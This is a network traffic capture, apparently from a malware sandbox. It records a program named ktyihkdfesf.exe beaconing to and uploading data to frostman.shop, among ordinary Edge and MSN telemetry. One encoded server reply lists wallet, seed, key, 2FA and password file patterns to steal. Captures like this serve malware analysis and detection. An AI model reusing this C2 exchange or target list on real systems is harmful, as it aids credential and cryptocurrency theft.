                                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                Cookie: USRLOC=; MUID=015EFEE8056263FB2030EBB304006296; _EDGE_S=F=1&SID=118F174EC8CC63DC31DB0215C90D62A3; _EDGE_V=1; SM=T
2024-12-20 06:31:51 UTC | 982 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Cache-Control: private, no-cache, proxy-revalidate, no-store
                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                Content-Type: image/gif
                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 10 Dec 2024 13:00:24 GMT
                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                ETag: "9270eb7934bdb1:0"
                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                                                                                                                                                                                                                                                                                Set-Cookie: SM=C; domain=c.msn.com; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                                Set-Cookie: MUID=015EFEE8056263FB2030EBB304006296; domain=.msn.com; expires=Wed, 14-Jan-2026 06:31:51 GMT; path=/; SameSite=None; Secure; Priority=High;
                                                                                                                                                                                                                                                                                                Set-Cookie: SRM_M=015EFEE8056263FB2030EBB304006296; domain=c.msn.com; expires=Wed, 14-Jan-2026 06:31:51 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                                Set-Cookie: MR=0; domain=c.msn.com; expires=Fri, 27-Dec-2024 06:31:51 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                                Set-Cookie: ANONCHK=0; domain=c.msn.com; expires=Fri, 20-Dec-2024 06:41:51 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:31:50 GMT
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                Content-Length: 42
2024-12-20 06:31:51 UTC | 42 | IN | Data Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 01 4c 00 3b
                                                                                                                                                                                                                                                                                                Data Ascii: GIF89a!,L;


Session ID | Source IP | Source Port | Destination IP | Destination Port
55 | 192.168.2.6 | 49960 | 20.198.119.143 | 443
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:51 UTC | 71 | OUT | Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 61 33 52 36 6c 6e 49 5a 6c 6b 61 34 49 6d 31 35 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 66 34 35 33 36 64 37 61 64 66 35 65 37 62 63 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: CNT 1 CON 305MS-CV: a3R6lnIZlka4Im15.1Context: cf4536d7adf5e7bc
2024-12-20 06:31:51 UTC | 249 | OUT
                                                                                                                                                                                                                                                                                                Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-12-20 06:31:51 UTC | 1084 | OUT
                                                                                                                                                                                                                                                                                                Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: a3R6lnIZlka4Im15.2Context: cf4536d7adf5e7bc<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAWAgqWEry+XLLb96tInFYFRmEJyhonhbopTD+1CzJW8BnsEx3YxB/WRudpg7JqbWwpqeaeV10b/4JdJJPDua2tWus1KtXbPe349g/GFKaZ6rb3
2024-12-20 06:31:51 UTC | 74 | OUT | Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 61 33 52 36 6c 6e 49 5a 6c 6b 61 34 49 6d 31 35 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 66 34 35 33 36 64 37 61 64 66 35 65 37 62 63 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: BND 3 CON\QOS 56MS-CV: a3R6lnIZlka4Im15.3Context: cf4536d7adf5e7bc
2024-12-20 06:31:51 UTC | 14 | IN | Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: 202 1 CON 58
2024-12-20 06:31:51 UTC | 58 | IN | Data Raw: 4d 53 2d 43 56 3a 20 68 63 56 59 58 43 62 33 48 45 53 47 41 5a 6f 64 37 74 53 4e 51 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                                                                                Data Ascii: MS-CV: hcVYXCb3HESGAZod7tSNQw.0Payload parsing failed.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
56 | 192.168.2.6 | 49972 | 116.203.12.114 | 443 | 1468 | C:\Users\user\Desktop\ktyihkdfesf.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:52 UTC | 325 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----OZUKFK6PZ58YM7QQ1V3O
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                Host: frostman.shop
                                                                                                                                                                                                                                                                                                Content-Length: 331
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-12-20 06:31:52 UTC | 331 | OUT
Data Ascii: ------OZUKFK6PZ58YM7QQ1V3OContent-Disposition: form-data; name="token"889f5f40738c5dc3f18f9676ef06948f------OZUKFK6PZ58YM7QQ1V3OContent-Disposition: form-data; name="build_id"d3e426b319e78f89e66d1acb7676d093------OZUKFK6PZ58YM7QQ1V3OCont
2024-12-20 06:31:53 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Dec 2024 06:31:53 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-20 06:31:53 UTC | 1524 | IN
Data Ascii: 5e8REVTS1RPUHwlREVTS1RPUCVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKiwqaGl0Yn


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
57 | 192.168.2.6 | 49981 | 116.203.12.114 | 443 | 1468 | C:\Users\user\Desktop\ktyihkdfesf.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:54 UTC | 325 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----VA16PHVSJEKNYMGDTRIE
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: frostman.shop
Content-Length: 453
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-20 06:31:54 UTC | 453 | OUT
Data Ascii: ------VA16PHVSJEKNYMGDTRIEContent-Disposition: form-data; name="token"889f5f40738c5dc3f18f9676ef06948f------VA16PHVSJEKNYMGDTRIEContent-Disposition: form-data; name="build_id"d3e426b319e78f89e66d1acb7676d093------VA16PHVSJEKNYMGDTRIECont
2024-12-20 06:31:55 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Dec 2024 06:31:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-20 06:31:55 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
58 | 192.168.2.6 | 49986 | 52.178.17.2 | 443 | 2168 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:55 UTC | 1044 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734676313254&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
Host: browser.events.data.msn.com
Connection: keep-alive
Content-Length: 11917
sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-platform: "Windows"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: https://ntp.msn.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
Cookie: USRLOC=; MUID=015EFEE8056263FB2030EBB304006296; _EDGE_S=F=1&SID=118F174EC8CC63DC31DB0215C90D62A3; _EDGE_V=1; _C_ETH=1; msnup=
2024-12-20 06:31:55 UTC | 11917 | OUT
Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-20T06:31:53.251Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":2,"installId":"56f1d725-0e61-48c2-81cb-80143a1620a5","epoch":"902288666"},"app":{"locale"
2024-12-20 06:31:56 UTC | 890 | IN | HTTP/1.1 204 No Content
Content-Length: 0
Server: Microsoft-HTTPAPI/2.0
Strict-Transport-Security: max-age=31536000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: MC1=GUID=3e4f717514fa493db7b26ff64e6eaa19&HASH=3e4f&LV=202412&V=4&LU=1734676315786; Domain=.microsoft.com; Expires=Sat, 20 Dec 2025 06:31:55 GMT; Path=/;Secure; SameSite=None
Set-Cookie: MS0=5e4d79f72d774e93aab09bd169cbb71d; Domain=.microsoft.com; Expires=Fri, 20 Dec 2024 07:01:55 GMT; Path=/;Secure; SameSite=None
time-delta-millis: 2532
Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
Access-Control-Allow-Methods: POST
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: https://ntp.msn.com
Access-Control-Expose-Headers: time-delta-millis
Date: Fri, 20 Dec 2024 06:31:55 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
59 | 192.168.2.6 | 49987 | 52.178.17.2 | 443 | 2168 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:55 UTC | 1043 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734676313257&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
Host: browser.events.data.msn.com
Connection: keep-alive
Content-Length: 5171
sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-platform: "Windows"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: https://ntp.msn.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
Cookie: USRLOC=; MUID=015EFEE8056263FB2030EBB304006296; _EDGE_S=F=1&SID=118F174EC8CC63DC31DB0215C90D62A3; _EDGE_V=1; _C_ETH=1; msnup=
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:55 UTC5171OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 32 30 54 30 36 3a 33 31 3a 35 33 2e 32 35 37 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 33 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 35 36 66 31 64 37 32 35 2d 30 65 36 31 2d 34 38 63 32 2d 38 31 63 62 2d 38 30 31 34 33 61 31 36 32 30 61 35 22 2c 22 65 70 6f 63 68 22 3a 22 39 30 32 32 38 38 36 36 36 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 22
                                                                                                                                                                                                                                                                                                Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-20T06:31:53.257Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":3,"installId":"56f1d725-0e61-48c2-81cb-80143a1620a5","epoch":"902288666"},"app":{"locale"
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:56 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                Set-Cookie: MC1=GUID=648aa7eeaac1460a955c3286febc5fea&HASH=648a&LV=202412&V=4&LU=1734676315775; Domain=.microsoft.com; Expires=Sat, 20 Dec 2025 06:31:55 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                Set-Cookie: MS0=053a2ac4d10f4fd2bdf96cf1cef1ea89; Domain=.microsoft.com; Expires=Fri, 20 Dec 2024 07:01:55 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                time-delta-millis: 2518
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:31:55 GMT
                                                                                                                                                                                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
60 | 192.168.2.6 | 49989 | 52.178.17.2 | 443 | 2168 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:56 UTC | 1033 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734676314091&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
Host: browser.events.data.msn.com
Connection: keep-alive
Content-Length: 5369
sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-platform: "Windows"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: https://ntp.msn.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
Cookie: USRLOC=; MUID=015EFEE8056263FB2030EBB304006296; _EDGE_S=F=1&SID=118F174EC8CC63DC31DB0215C90D62A3; _EDGE_V=1; msnup=
2024-12-20 06:31:56 UTC | 5369 | OUT | Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-20T06:31:54.090Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":4,"installId":"56f1d725-0e61-48c2-81cb-80143a1620a5","epoch":"902288666"},"app":{"locale"
2024-12-20 06:31:56 UTC | 890 | IN | HTTP/1.1 204 No Content
Content-Length: 0
Server: Microsoft-HTTPAPI/2.0
Strict-Transport-Security: max-age=31536000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: MC1=GUID=803469995fb14dcbbac1bd20543a5729&HASH=8034&LV=202412&V=4&LU=1734676316603; Domain=.microsoft.com; Expires=Sat, 20 Dec 2025 06:31:56 GMT; Path=/;Secure; SameSite=None
Set-Cookie: MS0=0c7a1b1a9f0742e8b5ba8d0722f89df8; Domain=.microsoft.com; Expires=Fri, 20 Dec 2024 07:01:56 GMT; Path=/;Secure; SameSite=None
time-delta-millis: 2512
Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
Access-Control-Allow-Methods: POST
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: https://ntp.msn.com
Access-Control-Expose-Headers: time-delta-millis
Date: Fri, 20 Dec 2024 06:31:56 GMT
Connection: close


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                61192.168.2.64999052.178.17.24432168C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:56 UTC1033OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734676314250&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                Content-Length: 9806
                                                                                                                                                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                                                                                                                                                                                                                                Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                Cookie: USRLOC=; MUID=015EFEE8056263FB2030EBB304006296; _EDGE_S=F=1&SID=118F174EC8CC63DC31DB0215C90D62A3; _EDGE_V=1; msnup=
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:56 UTC9806OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 43 6f 6e 74 65 6e 74 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 32 30 54 30 36 3a 33 31 3a 35 34 2e 32 35 30 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 35 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 35 36 66 31 64 37 32 35 2d 30 65 36 31 2d 34 38 63 32 2d 38 31 63 62 2d 38 30 31 34 33 61 31 36 32 30 61 35 22 2c 22 65 70 6f 63 68 22 3a 22 39 30 32 32 38 38 36 36 36 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61
                                                                                                                                                                                                                                                                                                Data Ascii: {"name":"MS.News.Web.ContentView","time":"2024-12-20T06:31:54.250Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":5,"installId":"56f1d725-0e61-48c2-81cb-80143a1620a5","epoch":"902288666"},"app":{"loca
2024-12-20 06:31:57 UTC | 890 | IN | HTTP/1.1 204 No Content
Content-Length: 0
Server: Microsoft-HTTPAPI/2.0
Strict-Transport-Security: max-age=31536000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: MC1=GUID=567f2f10eb254f29b32a2d99c3b69f25&HASH=567f&LV=202412&V=4&LU=1734676316754; Domain=.microsoft.com; Expires=Sat, 20 Dec 2025 06:31:56 GMT; Path=/;Secure; SameSite=None
Set-Cookie: MS0=2f5e6258ec8943169370a4ddb5b872b5; Domain=.microsoft.com; Expires=Fri, 20 Dec 2024 07:01:56 GMT; Path=/;Secure; SameSite=None
time-delta-millis: 2504
Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
Access-Control-Allow-Methods: POST
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: https://ntp.msn.com
Access-Control-Expose-Headers: time-delta-millis
Date: Fri, 20 Dec 2024 06:31:56 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
62 | 192.168.2.6 | 49995 | 116.203.12.114 | 443 | 1468 | C:\Users\user\Desktop\ktyihkdfesf.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:58 UTC | 327 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----R1V3EC2VAAAAAIEUSJ58
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: frostman.shop
Content-Length: 98177
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-20 06:31:58 UTC | 16355 | OUT | Data Ascii: ------R1V3EC2VAAAAAIEUSJ58Content-Disposition: form-data; name="token"889f5f40738c5dc3f18f9676ef06948f------R1V3EC2VAAAAAIEUSJ58Content-Disposition: form-data; name="build_id"d3e426b319e78f89e66d1acb7676d093------R1V3EC2VAAAAAIEUSJ58Cont
2024-12-20 06:31:59 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Dec 2024 06:31:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-20 06:31:59 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
63 | 192.168.2.6 | 50003 | 116.203.12.114 | 443 | 1468 | C:\Users\user\Desktop\ktyihkdfesf.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:32:01 UTC | 325 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----AIM7GLFCBIE3EUS00HLX
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: frostman.shop
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-20 06:32:01 UTC | 331 | OUT | Data Ascii: ------AIM7GLFCBIE3EUS00HLXContent-Disposition: form-data; name="token"889f5f40738c5dc3f18f9676ef06948f------AIM7GLFCBIE3EUS00HLXContent-Disposition: form-data; name="build_id"d3e426b319e78f89e66d1acb7676d093------AIM7GLFCBIE3EUS00HLXCont
2024-12-20 06:32:02 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Dec 2024 06:32:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-20 06:32:02 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
64 | 192.168.2.6 | 50010 | 116.203.12.114 | 443 | 1468 | C:\Users\user\Desktop\ktyihkdfesf.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:32:03 UTC | 325 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----7QQ1N79ZC2V37Q9ZCBIW
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: frostman.shop
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-20 06:32:03 UTC | 331 | OUT | Data Ascii: ------7QQ1N79ZC2V37Q9ZCBIWContent-Disposition: form-data; name="token"889f5f40738c5dc3f18f9676ef06948f------7QQ1N79ZC2V37Q9ZCBIWContent-Disposition: form-data; name="build_id"d3e426b319e78f89e66d1acb7676d093------7QQ1N79ZC2V37Q9ZCBIWCont
                                                                                                                                                                                                                                                                                                2024-12-20 06:32:04 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:32:04 GMT
                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-12-20 06:32:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
65 | 192.168.2.6 | 50022 | 20.198.119.143 | 443
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:32:07 UTC | 71 | OUT | Data Ascii: CNT 1 CON 305MS-CV: NKQ+U+tyuESjlfbu.1Context: c78654c66e979867
2024-12-20 06:32:07 UTC | 249 | OUT | Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
